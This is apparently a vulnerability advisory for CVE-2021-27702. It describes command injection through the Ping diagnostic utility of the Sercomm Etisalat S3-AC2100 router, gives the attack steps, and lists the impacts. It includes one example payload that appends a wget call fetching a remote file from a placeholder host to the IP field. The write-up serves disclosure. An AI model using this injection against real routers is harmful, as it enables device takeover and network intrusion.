CVE-2021-27702
The Sercomm Router Etisalat Model S3-AC2100 is vulnerable to Incorrect Access Control through its Diagnostic Utility available within the router's dashboard. This vulnerability occurs because the diagnostic utility, specifically the Ping Utility, lacks proper access controls or validation, allowing unauthorized users to execute arbitrary commands on the router.
By exploiting this vulnerability, an attacker who gains access to the router's dashboard can inject malicious commands into the Ping Utility. This is typically done by entering crafted input, such as a remote file inclusion (RFI) payload, in the IP address or command field. This could allow the attacker to execute arbitrary commands, leading to a compromise of the router.
Attack Vector:
Log in to Router Dashboard: The attacker first needs to log into the router’s dashboard, typically requiring valid credentials.
Access the Diagnostic Utility: Once inside the router dashboard, the attacker navigates to the Diagnostic Utility section.
Use the Ping Utility: In the Ping Utility, the attacker can input an IP address followed by a crafted command. For example:
127.0.0.1| wget https://x.x.x.x/rfi.txt
This injects a command into the Ping Utility that the router then executes.
Command Execution: The injected command is processed by the router, which may then download and execute a remote file (such as rfi.txt) from an external server. The content of this file could be malicious, leading to further exploitation, such as remote code execution (RCE), system compromise, or unauthorized access to sensitive router settings.
Impact:
Remote Code Execution (RCE): By exploiting this vulnerability, an attacker can potentially execute arbitrary code on the router, leading to full control over the device.
System Compromise: The attacker could manipulate router settings, install malicious firmware, or disrupt normal operation by altering configuration files or executing harmful commands.
Data Theft or Leak: If the attacker gains full access, they could exfiltrate sensitive data stored on the router or monitor network traffic.
Privilege Escalation: Successful exploitation could lead to privilege escalation, allowing the attacker to perform administrative actions, change network settings, or bypass security measures.
Network Disruption: The attacker may cause network outages, block legitimate access, or create backdoors for continued access.
Reputation Damage: Affected users could lose trust in the device and the service provider (e.g., Etisalat), leading to potential customer churn.